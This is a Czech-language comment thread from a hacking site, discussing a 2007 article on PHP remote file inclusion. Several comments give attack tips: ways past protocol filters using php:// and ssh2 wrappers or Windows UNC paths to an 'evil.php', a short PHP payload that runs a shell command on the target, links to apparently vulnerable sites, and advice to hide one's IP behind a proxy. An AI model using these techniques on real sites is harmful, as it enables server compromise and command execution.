Zpět na seznam článků     Zpět na článek

Komentáře ke článku

 
 
 BBCode
qaaz | 213.211.51.*27.1.2007 2:01
jeste k protokolum. tam, kde skript hlida, jestli jmeno inkludovaneho souboru neobsahuje nejaky konkretni protokol, jako http:\\ apod., bych krome zmineneho ftp:\\ upozornil jeste na ty mnohem mene pouzivane (a tedy exotickejsi a opominanejsi) wrappery jako je treba php:\\ a ssh2.*:\\.
dalsi uzitecna ficura je windowsi nativni podpora unc cest na smb servery, takze pokud skript bezi na widlich a hlida vsechny mozne protokoly (nebo obecne :\\ jako takove), tak porad lze nacist remotni soubor pres \\smbserver\sdileni\evil.php.
vice k protokolum tady:
[link]
cele je to proste o tom, vedet o neco vic, nez autor daneho softu. takze si bezte stahnout dokumentaci.
[ :\\ je zamerne s opacnymi lomitky, aby mi to system neprekopal na linky ]
qaaz | 213.211.51.*27.1.2007 1:19
pripona .php u remotne inkludovanych souboru nicemu nevadi. kdyz je ten soubor na serveru s podporou php a server tudiz nevraci obsah skriptu, ale spousti ho a vraci jeho vystup, no tak se tomu proste prizpusobime a v souboru nebudeme mit primo hacker-kod, ale kod, jehoz vystupem bude ten hacker-kod.
takze napriklad misto:
<?php system("ls -la"); ?>
do nej dame:
<?php echo('<?php system("ls -la"); ?>'); ?>
a vesele inkludujeme.
naco_nickk | 83.208.156.*25.1.2007 21:33
Jimi Hendrix, jednim slovem 3,14ca...za prve CRACKED a ne HACKED a za druhe - nekdo napise tut. a ty to akorat pouzijes, wake up!
XYZ | 85.71.165.*25.1.2007 1:24
Jimi Hendrix: A jako co. To se ted vsichni maji posrat? To je normalni lamrina, co jsi ted provedl. Pokud bych nechal bezet vyhledavaci skript, tak tech webu mam tri prdele..
Jimi Hendrix | 216.246.7.*24.1.2007 22:20
PHP Include stranky sample:

[link]
[link]
[link]
[link]

Najděte rozdíly :)
cURLy bOi | 89.176.11.*23.1.2007 16:05
MOOOOOC POVEDENY CLANEK!!! congrats
Techi | E-mail | Website23.1.2007 13:08
Ale proč ne, aspoň vytočíte pár amatérskejch programátorů :)
BTW Emekei by měl lamám vysvětlit -použít nějakej online proxy kvůli logům vlastní IP adresy...
Dark Craft | PGP20.1.2007 11:18
Sice me to nedalo nic noveho (krome tech session) ale je to velmi pekne napsany clanek, konecne neco co ma opravdu "uroven" na to aby bylo v clancich a ne v usertexts (vetsina ostatnich clanku :P)
dayvee | Website | ICQ 26899873318.1.2007 23:03
jo presne. ze zacatku sem si rikal proc emkei pise takovy kraviny pro lamy, ale dole sem nazor zmenil. ty metody sou sice asi znamy, ale napad s pouzitim ftp se mi zalibil a u sessions sem pomalu neveril vlastnim ocim ... fakt good job
Profik123 | E-mail | Website | PGP | ICQ 342-453-21418.1.2007 19:30
Moc hezkej článek. Málokdy se mi u nějakýho článku stane, že bych se dozvěděl něco novýho. A tady mě překvapila ta metoda s těma SESSION...
Fakt jeden z nejlepších článků poslední doby :-)

Stránky: 1 2 3 4
© 2003–2024 SOOM.cz | ISSN 1804-7270 | info@soom.cz | IRC #soom | changelog | MWRlMGMwZ